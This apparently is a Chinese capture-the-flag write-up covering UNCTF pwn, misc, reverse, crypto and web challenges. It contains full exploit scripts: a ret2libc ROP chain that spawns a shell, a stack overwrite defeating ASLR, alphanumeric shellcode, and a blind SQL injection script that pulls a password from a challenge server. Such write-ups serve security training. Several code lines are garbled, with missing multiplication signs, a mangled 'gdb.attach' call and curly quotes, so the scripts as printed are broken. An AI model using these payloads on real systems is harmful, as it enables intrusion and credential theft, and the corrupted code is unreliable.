1.Pwn
1Babyrop
简单的一道栈溢出题目先泄露libc然后使用gadgetgetshell
Exp如下:
#name:doudoudedi
#coding:utf-8
from pwn import *
from LibcSearcher import *
def debug():
gdb.attach§
#p=process(’./pwn4’)
p=remote(‘101.71.29.5’,10041)
elf=ELF(’./pwn4’)
main=0x08048592
pop_edx=0x080483b5
p.recvuntil(’!’)
payload=‘a’*0x20+‘ffff’
p.sendline(payload)
payload=‘a’*20+p32(elf.plt[‘puts’])+p32(main)+p32(elf.got[‘puts’])
p.recvuntil(‘name?’)
p.sendline(payload)
put_addr=u32(p.recvuntil(’\xf7’)[-4:])
log.success(‘put_addr: ‘+hex(put_addr))
libc=LibcSearcher(‘puts’,put_addr)
libcbase=put_addr-libc.dump(‘puts’)
system_addr=libcbase+libc.dump(‘system’)
bin_sh=libcbase+libc.dump(‘str_bin_sh’)
#debug()
payload=‘a’0x20+‘ffff’
p.sendline(payload)
p.recvuntil(‘name?’)
payload=‘a’(0x10+0x4)+p32(pop_edx)+p32(0)+p32(system_addr)+p32(0xdeadbeef)+p32(bin_sh)
p.sendline(payload)
p.interactive()
2.So_so_easy_pwn
也是常规的题目估计是公用了一个栈空间call eax(这个忘记了)然后开启随机化我们将第四位自己设置即可
Exp:
#name:doudouddi
#coding:utf-8
from pwn import *
#p=process(’./pwn’)
p=remote(‘101.71.29.5’,10000)
libc=ELF(’./x86_libc.so.6’)
elf=ELF(’./pwn’)
system_offset=elf.symbols[‘system’]
bin_sh_of=0x0B68
def debug():
gdb.attach§
p.recvuntil('the ‘)
ads=(int(p.recvuntil(’ ',drop=True)[-6:])<<16)+0x1000
flag_addr=ads+0x09D6
#log.success(‘bin_sh: ‘+hex(bin_sh))
p.recvuntil(‘name?’)
payload=‘a’*12+p32(flag_addr)
print len(payload)
log.success(‘ads: ‘+hex(ads))
#debug()
p.send(payload)
p.recvuntil(’:’)
p.sendline(‘1’)
p.interactive()
3easy_shellcode
if ( (s[i] <= 64 || s[i] > 90) && (s[i] <= 96 || s[i] > 122) && (s[i] <= 47 || s[i] > 57) && s[i] != 10 && s[i] )
告诉我们只能传数字字母将写入shellcode我们用师傅写的工具将amd64的shellcode转为纯字母
和数字即可
Exp:
#name:doudoudedi
#coding:utf-8
from pwn import *
from ae64 import AE64
p=process(’./pwn3’)
context.arch=‘amd64’
def debug():
gdb.attach§
p.recvuntil(‘say?’)
debug()
obj=AE64()
payload=obj.encode(asm(shellcraft.sh()))
log.success('shellcode: '+str(payload))
p.sendline(payload)
p.interactive()
2.Misc
1快乐游戏题玩游戏即可以获得flag
2think
简单的阅读脚本然后就直接跑就行了
脚本如下:
import base64
‘’’
a=[‘MTM=’,‘MDI=’,‘MDI=’,‘MTM=’,‘MWQ=’,‘NDY=’,‘NWE=’,‘MDI=’,‘NGQ=’,‘NTI=’,‘NGQ=’,‘NTg=’,‘NWI=’,‘MTU=’,‘NWU=’,‘MTQ=’,‘MGE=’,‘NWE=’,‘MTI=’,‘MDA=’,‘NGQ=’,‘NWM=’,‘MDE=’,‘MTU=’,‘MDc=’,‘MTE=’,‘MGM=’,‘NTA=’,‘NDY=’,‘NTA=’,‘MTY=’,‘NWI=’,‘NTI=’,‘NDc=’,‘MDI=’,‘NDE=’,‘NWU=’,‘MWU=’]
flag=[]
key=‘unctf’
for i in a:
i=‘0x’+base64.b64decode(i)
flag.append(i)
‘’’
key=‘unctf’
a=[0x13, 0x02, 0x02, 0x13, 0x1d, 0x46, 0x5a, 0x02, 0x4d, 0x52, 0x4d, 0x58, 0x5b, 0x15, 0x5e, 0x14, 0x0a, 0x5a, 0x12, 0x00, 0x4d, 0x5c, 0x01, 0x15, 0x07, 0x11, 0x0c, 0x50, 0x46, 0x50, 0x16, 0x5b, 0x52, 0x47, 0x02, 0x41, 0x5e, 0x1e]
true=’’
for i in range(len(a)):
true+=chr(ord(key[i%len(key)])^a[i])
print true
3信号不好我先挂了
这道题是先lsb查看发现有一个色彩通道有异常然后分离出一个压缩包只有一个图片盲水印脚本跑即可
Ps:盲水印用到的py脚本可以在github上下载,https://github.com/chishaxie/BlindWaterMark,使用时需要安装前置opencv库。
4亲爱的
图片分离出压缩包然后qq音乐评论里面找密码得到密码然后我也是服了然后解密得到flag
Reverse
1.666
发现是一个简单的异或逆向直接写脚本跑就行了
脚本如下:
a=‘izwhroz"“w"v.K”.Ni’
b1=’’
for i in range(len(a)):
print a[i]
for i in range(0,18,3):
b1+=chr((0x12ord(a[i]))-6)+chr((ord(a[i+1])0x12)+6)+chr(ord(a[i+2])60x12)
print b1
2.easy_android
用工具打开发现是md5然后有一串加密的字符匹配估计是让我们去爆破它就可以了直接上脚本
我们需要现异或然后md5加密与其比较既可以了用的别的师傅的脚本
脚本如下
import hashlib
a = “2061e19de42da6e0de934592a2de3ca0”
b = “a81813dabd92cefdc6bbf28ea522d2d1”
c = “4b98921c9b772ed5971c9eca38b08c9f”
d = “81773872cbbd24dd8df2b980a2b47340”
e = “73b131aa8e4847d27a1c20608199814e”
f = “bbd7c4e20e99f0a3bf21c148fe22f21d”
g = “bf268d46ef91eea2634c34db64c91ef2”
h = “0862deb943decbddb87dbf0eec3a06cc”
i = “7a59d932e8184ae963c40a759cc38fec”
s = “flag{this_is_a_fake_flag_ahhhhh}”
file = open(‘superdic.txt’,‘r’)
flag = “”
def XOR(string ,s1):
x = “”
for i in range(4):
x += chr(ord(s1[i]) ^ ord(string[i]))
return x
def search(xor1,xor2,s):
x = XOR(xor1,xor2)
x = md5value = hashlib.md5(x.encode(‘utf-8’)).digest().hex()
if(x == s):
return xor1
return “”
try:
while True:
text_line = file.readline()
if text_line:
x = text_line[0:4]
s1 = search(x,“flag”,a)
if(s1 != “”):
flag += “-1-” + s1
print(flag)
s2 = search(x,"{thi",b)
if(s2 != “”):
flag += “-2-” + s2
print(flag)
s3 = search(x,“s_is”,c)
if(s3 != “”):
flag += “-3-” + s3
print(flag)
s4 = search(x,“a_f",d)
if(s4 != “”):
flag += “-4-” + s4
print(flag)
s5 = search(x,"ake”,e)
if(s5 != “”):
flag += “-5-” + s5
print(flag)
s6 = search(x,“flag”,f)
if(s6 != “”):
flag += “-6-” + s6
print(flag)
s7 = search(x,"_ahh",g)
if(s7 != “”):
flag += “-7-” + s7
print(flag)
s8 = search(x,“hhh}”,h)
if(s8 != “”):
flag += + s8
print(flag)
else:
break
finally:
file.close()
print(flag)
3.Babyxor
这里先是脱壳然后直接OD动态调试出flag
4.奇怪的数组
这道题直接就有人网群里面放了flag我一试直接对了额额
4.Crypto
1.一句话加密
直接用winhex打开拖入最下面既可以看见n然后我们分解n得到pq用rabin(rsa)的一种脚本直接跑2个c跑2次加起来就是flag
import gmpy
def n2s(num):
t = hex(num)[2:]
if len(t) % 2 == 1:
return (‘0’+t).decode(‘hex’)
return t.decode(‘hex’)
#c = 62501276588435548378091741866858001847904773180843384150570636252430662080263
c=72510845991687063707663748783701000040760576923237697638580153046559809128516
p = 275127860351348928173285174381581152299
q = 319576316814478949870590164193048041239
n = pq
r = pow(c,int((p+1)/4),p)
s = pow(c,int((q+1)/4),q)
a = gmpy.invert(p,q)
b = gmpy.invert(q,p)
x =(aps+bqr)%n
y =(aps-bq*r)%n
print (n2s(x%n))
print (n2s((-x)%n))
print (n2s(y%n))
print (n2s((-y)%n))
#unctf{412a1ed6d21e55191ee5131f266f5178}
不仅仅是RSA
这道题我好像在网上找到了类似题目脚本我就直接用跑出了flag
Web
Checkin
需要先改nickname突然有一个师傅就把flag给发了出来提交正确
2.easy admin
用awvs扫描就会发现有盲注在forget页面可以直接sqlmap跑也可以写脚本这里给上脚本
网上找了一个脚本直接用
import requests
url = ‘http://101.71.29.5:10049/index.php?file=forget’
result = ‘’
for x in range(0, 100):
high = 255
low = 0
mid = (low + high) // 2
while high > low:
payload = “1’or if(ascii(substr((password),%d,1))>%d,1,0)#” % (x, mid)
params = {
‘username’:payload
}
response = requests.post(url, data=params)#,proxies=proxies)
if b’hacker’ in response.content:
print(“error sql,exit”)
exit(0)
if b’ok’ in response.content:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
result += chr(int(mid))
print(result)
3帮赵总征婚
是啥了好像是用kali的字典跑但是我直接用bp的跑也成功了~~
4 NSB restart password
这道题看着就像逻辑漏洞,先注册一个账号然后修改restart3.php
没有验证直接修改然后再次登入即可得到flag
